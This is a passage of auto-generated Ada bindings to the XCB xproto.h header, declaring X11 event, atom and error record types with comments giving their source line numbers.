bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:717 sequence : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:718 window : aliased xcb_window_t; -- /usr/include/xcb/xproto.h:719 x : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:720 y : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:721 width : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:722 height : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:723 count : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:724 pad1 : aliased xcb_expose_event_t_array1823; -- /usr/include/xcb/xproto.h:725 end record with Convention => C_Pass_By_Copy; -- /usr/include/xcb/xproto.h:715 --* Opcode for xcb_graphics_exposure. --* -- * @brief xcb_graphics_exposure_event_t -- * type xcb_graphics_exposure_event_t_array1897 is array (0 .. 2) of aliased bits_stdint_uintn_h.uint8_t; type xcb_graphics_exposure_event_t is record response_type : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:735 pad0 : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:736 sequence : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:737 drawable : aliased xcb_drawable_t; -- /usr/include/xcb/xproto.h:738 x : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:739 y : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:740 width : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:741 height : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:742 minor_opcode : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:743 count : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:744 major_opcode : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:745 pad1 : aliased xcb_graphics_exposure_event_t_array1897; -- /usr/include/xcb/xproto.h:746 end record with Convention => C_Pass_By_Copy; -- /usr/include/xcb/xproto.h:734 --* Opcode for xcb_no_exposure. --* -- * @brief xcb_no_exposure_event_t -- * type xcb_no_exposure_event_t is record response_type : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:756 pad0 : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:757 sequence : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:758 drawable : aliased xcb_drawable_t; -- /usr/include/xcb/xproto.h:759 minor_opcode : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:760 major_opcode : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:761 pad1 : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:762 end record with Convention => C_Pass_By_Copy; -- /usr/include/xcb/xproto.h:755 type xcb_visibility_t is (XCB_VISIBILITY_UNOBSCURED, XCB_VISIBILITY_PARTIALLY_OBSCURED, XCB_VISIBILITY_FULLY_OBSCURED) with Convention => C; -- /usr/include/xcb/xproto.h:765 --* Opcode for xcb_visibility_notify. --* -- * @brief xcb_visibility_notify_event_t -- * type xcb_visibility_notify_event_t_array1897 is array (0 .. 2) of aliased bits_stdint_uintn_h.uint8_t; type xcb_visibility_notify_event_t is record response_type : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:778 pad0 : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:779 sequence : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:780 window : aliased xcb_window_t; -- /usr/include/xcb/xproto.h:781 state : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:782 pad1 : aliased xcb_visibility_notify_event_t_array1897; -- /usr/include/xcb/xproto.h:783 end record with Convention => C_Pass_By_Copy; -- /usr/include/xcb/xproto.h:777 --* Opcode for xcb_create_notify. --* -- * @brief xcb_create_notify_event_t -- * type xcb_create_notify_event_t is record response_type : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:793 pad0 : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:794 sequence : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:795 parent : aliased xcb_window_t; -- /usr/include/xcb/xproto.h:796 window : aliased xcb_window_t; -- /usr/include/xcb/xproto.h:797 x : aliased bits_stdint_intn_h.int16_t; -- /usr/include/xcb/xproto.h:798 y : aliased bits_stdint_intn_h.int16_t; -- /usr/include/xcb/xproto.h:799 width : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:800 height : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:801 border_width : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:802 override_redirect : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:803 pad1 : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:804 end record with Convention => C_Pass_By_Copy; -- /usr/include/xcb/xproto.h:792 --* Opcode for xcb_destroy_notify. --* -- * @brief xcb_destroy_notify_event_t -- * type xcb_destroy_notify_event_t is record response_type : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:814 pad0 : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:815 sequence : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:816 event : aliased xcb_window_t; -- /usr/include/xcb/xproto.h:817 window : aliased xcb_window_t; -- /usr/include/xcb/xproto.h:818 end record with Convention => C_Pass_By_Copy; -- /usr/include/xcb/xproto.h:813 --* Opcode for xcb_unmap_notify. --* -- * @brief xcb_unmap_notify_event_t -- * type xcb_unmap_notify_event_t_array1897 is array (0 .. 2) of aliased bits_stdint_uintn_h.uint8_t; type xcb_unmap_notify_event_t is record response_type : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:828 pad0 : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:829 sequence : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:830 event : aliased xcb_window_t; -- /usr/include/xcb/xproto.h:831 window : aliased xcb_window_t; -- /usr/include/xcb/xproto.h:832 from_configure : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:833 pad1 : aliased xcb_unmap_notify_event_t_array1897; -- /usr/include/xcb/xproto.h:834 end record with Convention => C_Pass_By_Copy; -- /usr/include/xcb/xproto.h:827 --* Opcode for xcb_map_notify. --* -- * @brief xcb_map_notify_event_t -- * type xcb_map_notify_event_t_array1897 is array (0 .. 2) of aliased bits_stdint_uintn_h.uint8_t; type xcb_map_notify_event_t is record response_type : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:844 pad0 : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:845 sequence : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:846 event : aliased xcb_window_t; -- /usr/include/xcb/xproto.h:847 window : aliased xcb_window_t; -- /usr/include/xcb/xproto.h:848 override_redirect : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:849 pad1 : aliased xcb_map_notify_event_t_array1897; -- /usr/include/xcb/xproto.h:850 end record with Convention => C_Pass_By_Copy; -- /usr/include/xcb/xproto.h:843 --* Opcode for xcb_map_request. --* -- * @brief xcb_map_request_event_t -- * type xcb_map_request_event_t is record response_type : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:860 pad0 : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:861 sequence : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:862 parent : aliased xcb_window_t; -- /usr/include/xcb/xproto.h:863 window : aliased xcb_window_t; -- /usr/include/xcb/xproto.h:864 end record with Convention => C_Pass_By_Copy; -- /usr/include/xcb/xproto.h:859 --* Opcode for xcb_reparent_notify. --* -- * @brief xcb_reparent_notify_event_t -- * type xcb_reparent_notify_event_t_array1897 is array (0 .. 2) of aliased bits_stdint_uintn_h.uint8_t; type xcb_reparent_notify_event_t is record response_type : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:874 pad0 : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:875 sequence : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:876 event : aliased xcb_window_t; -- /usr/include/xcb/xproto.h:877 window : aliased xcb_window_t; -- /usr/include/xcb/xproto.h:878 parent : aliased xcb_window_t; -- /usr/include/xcb/xproto.h:879 x : aliased bits_stdint_intn_h.int16_t; -- /usr/include/xcb/xproto.h:880 y : aliased bits_stdint_intn_h.int16_t; -- /usr/include/xcb/xproto.h:881 override_redirect : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:882 pad1 : aliased xcb_reparent_notify_event_t_array1897; -- /usr/include/xcb/xproto.h:883 end record with Convention => C_Pass_By_Copy; -- /usr/include/xcb/xproto.h:873 --* Opcode for xcb_configure_notify. --* -- * @brief xcb_configure_notify_event_t -- * type xcb_configure_notify_event_t is record response_type : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:893 pad0 : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:894 sequence : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:895 event : aliased xcb_window_t; -- /usr/include/xcb/xproto.h:896 window : aliased xcb_window_t; -- /usr/include/xcb/xproto.h:897 above_sibling : aliased xcb_window_t; -- /usr/include/xcb/xproto.h:898 x : aliased bits_stdint_intn_h.int16_t; -- /usr/include/xcb/xproto.h:899 y : aliased bits_stdint_intn_h.int16_t; -- /usr/include/xcb/xproto.h:900 width : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:901 height : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:902 border_width : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:903 override_redirect : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:904 pad1 : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:905 end record with Convention => C_Pass_By_Copy; -- /usr/include/xcb/xproto.h:892 --* Opcode for xcb_configure_request. --* -- * @brief xcb_configure_request_event_t -- * type xcb_configure_request_event_t is record response_type : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:915 stack_mode : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:916 sequence : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:917 parent : aliased xcb_window_t; -- /usr/include/xcb/xproto.h:918 window : aliased xcb_window_t; -- /usr/include/xcb/xproto.h:919 sibling : aliased xcb_window_t; -- /usr/include/xcb/xproto.h:920 x : aliased bits_stdint_intn_h.int16_t; -- /usr/include/xcb/xproto.h:921 y : aliased bits_stdint_intn_h.int16_t; -- /usr/include/xcb/xproto.h:922 width : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:923 height : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:924 border_width : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:925 value_mask : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:926 end record with Convention => C_Pass_By_Copy; -- /usr/include/xcb/xproto.h:914 --* Opcode for xcb_gravity_notify. --* -- * @brief xcb_gravity_notify_event_t -- * type xcb_gravity_notify_event_t is record response_type : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:936 pad0 : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:937 sequence : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:938 event : aliased xcb_window_t; -- /usr/include/xcb/xproto.h:939 window : aliased xcb_window_t; -- /usr/include/xcb/xproto.h:940 x : aliased bits_stdint_intn_h.int16_t; -- /usr/include/xcb/xproto.h:941 y : aliased bits_stdint_intn_h.int16_t; -- /usr/include/xcb/xproto.h:942 end record with Convention => C_Pass_By_Copy; -- /usr/include/xcb/xproto.h:935 --* Opcode for xcb_resize_request. --* -- * @brief xcb_resize_request_event_t -- * type xcb_resize_request_event_t is record response_type : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:952 pad0 : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:953 sequence : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:954 window : aliased xcb_window_t; -- /usr/include/xcb/xproto.h:955 width : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:956 height : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:957 end record with Convention => C_Pass_By_Copy; -- /usr/include/xcb/xproto.h:951 type xcb_place_t is (XCB_PLACE_ON_TOP, XCB_PLACE_ON_BOTTOM) with Convention => C; -- /usr/include/xcb/xproto.h:960 --*< The window is now on top of all siblings. --*< The window is now below all siblings. --* Opcode for xcb_circulate_notify. --* -- * @brief xcb_circulate_notify_event_t -- * type xcb_circulate_notify_event_t_array1791 is array (0 .. 3) of aliased bits_stdint_uintn_h.uint8_t; type xcb_circulate_notify_event_t_array1897 is array (0 .. 2) of aliased bits_stdint_uintn_h.uint8_t; type xcb_circulate_notify_event_t is record response_type : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:976 pad0 : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:977 sequence : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:978 event : aliased xcb_window_t; -- /usr/include/xcb/xproto.h:979 window : aliased xcb_window_t; -- /usr/include/xcb/xproto.h:980 pad1 : aliased xcb_circulate_notify_event_t_array1791; -- /usr/include/xcb/xproto.h:981 place : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:982 pad2 : aliased xcb_circulate_notify_event_t_array1897; -- /usr/include/xcb/xproto.h:983 end record with Convention => C_Pass_By_Copy; -- /usr/include/xcb/xproto.h:975 --* Opcode for xcb_circulate_request. subtype xcb_circulate_request_event_t is xcb_circulate_notify_event_t; -- /usr/include/xcb/xproto.h:989 type xcb_property_t is (XCB_PROPERTY_NEW_VALUE, XCB_PROPERTY_DELETE) with Convention => C; -- /usr/include/xcb/xproto.h:991 --* Opcode for xcb_property_notify. --* -- * @brief xcb_property_notify_event_t -- * type xcb_property_notify_event_t_array1897 is array (0 .. 2) of aliased bits_stdint_uintn_h.uint8_t; type xcb_property_notify_event_t is record response_type : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:1003 pad0 : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:1004 sequence : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:1005 window : aliased xcb_window_t; -- /usr/include/xcb/xproto.h:1006 atom : aliased xcb_atom_t; -- /usr/include/xcb/xproto.h:1007 time : aliased xcb_timestamp_t; -- /usr/include/xcb/xproto.h:1008 state : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:1009 pad1 : aliased xcb_property_notify_event_t_array1897; -- /usr/include/xcb/xproto.h:1010 end record with Convention => C_Pass_By_Copy; -- /usr/include/xcb/xproto.h:1002 --* Opcode for xcb_selection_clear. --* -- * @brief xcb_selection_clear_event_t -- * type xcb_selection_clear_event_t is record response_type : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:1020 pad0 : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:1021 sequence : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:1022 time : aliased xcb_timestamp_t; -- /usr/include/xcb/xproto.h:1023 owner : aliased xcb_window_t; -- /usr/include/xcb/xproto.h:1024 selection : aliased xcb_atom_t; -- /usr/include/xcb/xproto.h:1025 end record with Convention => C_Pass_By_Copy; -- /usr/include/xcb/xproto.h:1019 type xcb_time_t is (XCB_TIME_CURRENT_TIME) with Convention => C; -- /usr/include/xcb/xproto.h:1028 subtype xcb_atom_enum_t is unsigned; XCB_ATOM_NONE : constant unsigned := 0; XCB_ATOM_ANY : constant unsigned := 0; XCB_ATOM_PRIMARY : constant unsigned := 1; XCB_ATOM_SECONDARY : constant unsigned := 2; XCB_ATOM_ARC : constant unsigned := 3; XCB_ATOM_ATOM : constant unsigned := 4; XCB_ATOM_BITMAP : constant unsigned := 5; XCB_ATOM_CARDINAL : constant unsigned := 6; XCB_ATOM_COLORMAP : constant unsigned := 7; XCB_ATOM_CURSOR : constant unsigned := 8; XCB_ATOM_CUT_BUFFER0 : constant unsigned := 9; XCB_ATOM_CUT_BUFFER1 : constant unsigned := 10; XCB_ATOM_CUT_BUFFER2 : constant unsigned := 11; XCB_ATOM_CUT_BUFFER3 : constant unsigned := 12; XCB_ATOM_CUT_BUFFER4 : constant unsigned := 13; XCB_ATOM_CUT_BUFFER5 : constant unsigned := 14; XCB_ATOM_CUT_BUFFER6 : constant unsigned := 15; XCB_ATOM_CUT_BUFFER7 : constant unsigned := 16; XCB_ATOM_DRAWABLE : constant unsigned := 17; XCB_ATOM_FONT : constant unsigned := 18; XCB_ATOM_INTEGER : constant unsigned := 19; XCB_ATOM_PIXMAP : constant unsigned := 20; XCB_ATOM_POINT : constant unsigned := 21; XCB_ATOM_RECTANGLE : constant unsigned := 22; XCB_ATOM_RESOURCE_MANAGER : constant unsigned := 23; XCB_ATOM_RGB_COLOR_MAP : constant unsigned := 24; XCB_ATOM_RGB_BEST_MAP : constant unsigned := 25; XCB_ATOM_RGB_BLUE_MAP : constant unsigned := 26; XCB_ATOM_RGB_DEFAULT_MAP : constant unsigned := 27; XCB_ATOM_RGB_GRAY_MAP : constant unsigned := 28; XCB_ATOM_RGB_GREEN_MAP : constant unsigned := 29; XCB_ATOM_RGB_RED_MAP : constant unsigned := 30; XCB_ATOM_STRING : constant unsigned := 31; XCB_ATOM_VISUALID : constant unsigned := 32; XCB_ATOM_WINDOW : constant unsigned := 33; XCB_ATOM_WM_COMMAND : constant unsigned := 34; XCB_ATOM_WM_HINTS : constant unsigned := 35; XCB_ATOM_WM_CLIENT_MACHINE : constant unsigned := 36; XCB_ATOM_WM_ICON_NAME : constant unsigned := 37; XCB_ATOM_WM_ICON_SIZE : constant unsigned := 38; XCB_ATOM_WM_NAME : constant unsigned := 39; XCB_ATOM_WM_NORMAL_HINTS : constant unsigned := 40; XCB_ATOM_WM_SIZE_HINTS : constant unsigned := 41; XCB_ATOM_WM_ZOOM_HINTS : constant unsigned := 42; XCB_ATOM_MIN_SPACE : constant unsigned := 43; XCB_ATOM_NORM_SPACE : constant unsigned := 44; XCB_ATOM_MAX_SPACE : constant unsigned := 45; XCB_ATOM_END_SPACE : constant unsigned := 46; XCB_ATOM_SUPERSCRIPT_X : constant unsigned := 47; XCB_ATOM_SUPERSCRIPT_Y : constant unsigned := 48; XCB_ATOM_SUBSCRIPT_X : constant unsigned := 49; XCB_ATOM_SUBSCRIPT_Y : constant unsigned := 50; XCB_ATOM_UNDERLINE_POSITION : constant unsigned := 51; XCB_ATOM_UNDERLINE_THICKNESS : constant unsigned := 52; XCB_ATOM_STRIKEOUT_ASCENT : constant unsigned := 53; XCB_ATOM_STRIKEOUT_DESCENT : constant unsigned := 54; XCB_ATOM_ITALIC_ANGLE : constant unsigned := 55; XCB_ATOM_X_HEIGHT : constant unsigned := 56; XCB_ATOM_QUAD_WIDTH : constant unsigned := 57; XCB_ATOM_WEIGHT : constant unsigned := 58; XCB_ATOM_POINT_SIZE : constant unsigned := 59; XCB_ATOM_RESOLUTION : constant unsigned := 60; XCB_ATOM_COPYRIGHT : constant unsigned := 61; XCB_ATOM_NOTICE : constant unsigned := 62; XCB_ATOM_FONT_NAME : constant unsigned := 63; XCB_ATOM_FAMILY_NAME : constant unsigned := 64; XCB_ATOM_FULL_NAME : constant unsigned := 65; XCB_ATOM_CAP_HEIGHT : constant unsigned := 66; XCB_ATOM_WM_CLASS : constant unsigned := 67; XCB_ATOM_WM_TRANSIENT_FOR : constant unsigned := 68; -- /usr/include/xcb/xproto.h:1032 --* Opcode for xcb_selection_request. --* -- * @brief xcb_selection_request_event_t -- * type xcb_selection_request_event_t is record response_type : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:1112 pad0 : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:1113 sequence : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:1114 time : aliased xcb_timestamp_t; -- /usr/include/xcb/xproto.h:1115 owner : aliased xcb_window_t; -- /usr/include/xcb/xproto.h:1116 requestor : aliased xcb_window_t; -- /usr/include/xcb/xproto.h:1117 selection : aliased xcb_atom_t; -- /usr/include/xcb/xproto.h:1118 target : aliased xcb_atom_t; -- /usr/include/xcb/xproto.h:1119 property : aliased xcb_atom_t; -- /usr/include/xcb/xproto.h:1120 end record with Convention => C_Pass_By_Copy; -- /usr/include/xcb/xproto.h:1111 --* Opcode for xcb_selection_notify. --* -- * @brief xcb_selection_notify_event_t -- * type xcb_selection_notify_event_t is record response_type : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:1130 pad0 : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:1131 sequence : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:1132 time : aliased xcb_timestamp_t; -- /usr/include/xcb/xproto.h:1133 requestor : aliased xcb_window_t; -- /usr/include/xcb/xproto.h:1134 selection : aliased xcb_atom_t; -- /usr/include/xcb/xproto.h:1135 target : aliased xcb_atom_t; -- /usr/include/xcb/xproto.h:1136 property : aliased xcb_atom_t; -- /usr/include/xcb/xproto.h:1137 end record with Convention => C_Pass_By_Copy; -- /usr/include/xcb/xproto.h:1129 type xcb_colormap_state_t is (XCB_COLORMAP_STATE_UNINSTALLED, XCB_COLORMAP_STATE_INSTALLED) with Convention => C; -- /usr/include/xcb/xproto.h:1140 --*< The colormap was uninstalled. --*< The colormap was installed. type xcb_colormap_enum_t is (XCB_COLORMAP_NONE) with Convention => C; -- /usr/include/xcb/xproto.h:1149 --* Opcode for xcb_colormap_notify. --* -- * @brief xcb_colormap_notify_event_t -- * type xcb_colormap_notify_event_t_array1823 is array (0 .. 1) of aliased bits_stdint_uintn_h.uint8_t; type xcb_colormap_notify_event_t is record response_type : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:1160 pad0 : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:1161 sequence : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:1162 window : aliased xcb_window_t; -- /usr/include/xcb/xproto.h:1163 colormap : aliased xcb_colormap_t; -- /usr/include/xcb/xproto.h:1164 u_new : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:1165 state : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:1166 pad1 : aliased xcb_colormap_notify_event_t_array1823; -- /usr/include/xcb/xproto.h:1167 end record with Convention => C_Pass_By_Copy; -- /usr/include/xcb/xproto.h:1159 --* -- * @brief xcb_client_message_data_t -- * type xcb_client_message_data_t_array1992 is array (0 .. 19) of aliased bits_stdint_uintn_h.uint8_t; type xcb_client_message_data_t_array1995 is array (0 .. 9) of aliased bits_stdint_uintn_h.uint16_t; type xcb_client_message_data_t_array1657 is array (0 .. 4) of aliased bits_stdint_uintn_h.uint32_t; type xcb_client_message_data_t (discr : unsigned := 0) is record case discr is when 0 => data8 : aliased xcb_client_message_data_t_array1992; -- /usr/include/xcb/xproto.h:1174 when 1 => data16 : aliased xcb_client_message_data_t_array1995; -- /usr/include/xcb/xproto.h:1175 when others => data32 : aliased xcb_client_message_data_t_array1657; -- /usr/include/xcb/xproto.h:1176 end case; end record with Convention => C_Pass_By_Copy, Unchecked_Union => True; -- /usr/include/xcb/xproto.h:1173 --* -- * @brief xcb_client_message_data_iterator_t -- * type xcb_client_message_data_iterator_t is record data : access xcb_client_message_data_t; -- /usr/include/xcb/xproto.h:1183 c_rem : aliased int; -- /usr/include/xcb/xproto.h:1184 index : aliased int; -- /usr/include/xcb/xproto.h:1185 end record with Convention => C_Pass_By_Copy; -- /usr/include/xcb/xproto.h:1182 --* Opcode for xcb_client_message. --* -- * @brief xcb_client_message_event_t -- * type xcb_client_message_event_t is record response_type : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:1195 format : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:1196 sequence : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:1197 window : aliased xcb_window_t; -- /usr/include/xcb/xproto.h:1198 c_type : aliased xcb_atom_t; -- /usr/include/xcb/xproto.h:1199 data : aliased xcb_client_message_data_t; -- /usr/include/xcb/xproto.h:1200 end record with Convention => C_Pass_By_Copy; -- /usr/include/xcb/xproto.h:1194 type xcb_mapping_t is (XCB_MAPPING_MODIFIER, XCB_MAPPING_KEYBOARD, XCB_MAPPING_POINTER) with Convention => C; -- /usr/include/xcb/xproto.h:1203 --* Opcode for xcb_mapping_notify. --* -- * @brief xcb_mapping_notify_event_t -- * type xcb_mapping_notify_event_t is record response_type : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:1216 pad0 : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:1217 sequence : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:1218 request : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:1219 first_keycode : aliased xcb_keycode_t; -- /usr/include/xcb/xproto.h:1220 count : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:1221 pad1 : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:1222 end record with Convention => C_Pass_By_Copy; -- /usr/include/xcb/xproto.h:1215 --* Opcode for xcb_ge_generic. --* -- * @brief xcb_ge_generic_event_t -- * type xcb_ge_generic_event_t_array2015 is array (0 .. 21) of aliased bits_stdint_uintn_h.uint8_t; type xcb_ge_generic_event_t is record response_type : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:1232 extension : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:1233 sequence : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:1234 length : aliased bits_stdint_uintn_h.uint32_t; -- /usr/include/xcb/xproto.h:1235 event_type : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:1236 pad0 : aliased xcb_ge_generic_event_t_array2015; -- /usr/include/xcb/xproto.h:1237 full_sequence : aliased bits_stdint_uintn_h.uint32_t; -- /usr/include/xcb/xproto.h:1238 end record with Convention => C_Pass_By_Copy; -- /usr/include/xcb/xproto.h:1231 --* Opcode for xcb_request. --* -- * @brief xcb_request_error_t -- * type xcb_request_error_t is record response_type : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:1248 error_code : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:1249 sequence : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:1250 bad_value : aliased bits_stdint_uintn_h.uint32_t; -- /usr/include/xcb/xproto.h:1251 minor_opcode : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:1252 major_opcode : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:1253 pad0 : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:1254 end record with Convention => C_Pass_By_Copy; -- /usr/include/xcb/xproto.h:1247 --* Opcode for xcb_value. --* -- * @brief xcb_value_error_t -- * type xcb_value_error_t is record response_type : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:1264 error_code : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:1265 sequence : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:1266 bad_value : aliased bits_stdint_uintn_h.uint32_t; -- /usr/include/xcb/xproto.h:1267 minor_opcode : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:1268 major_opcode : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:1269 pad0 : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:1270 end record with Convention => C_Pass_By_Copy; -- /usr/include/xcb/xproto.h:1263 --* Opcode for xcb_window. subtype xcb_window_error_t is xcb_value_error_t; -- /usr/include/xcb/xproto.h:1276 --* Opcode for xcb_pixmap. subtype xcb_pixmap_error_t is xcb_value_error_t; -- /usr/include/xcb/xproto.h:1281 --* Opcode for xcb_atom. subtype xcb_atom_error_t is xcb_value_error_t; -- /usr/include/xcb/xproto.h:1286 --* Opcode for xcb_cursor. subtype xcb_cursor_error_t is xcb_value_error_t; -- /usr/include/xcb/xproto.h:1291 --* 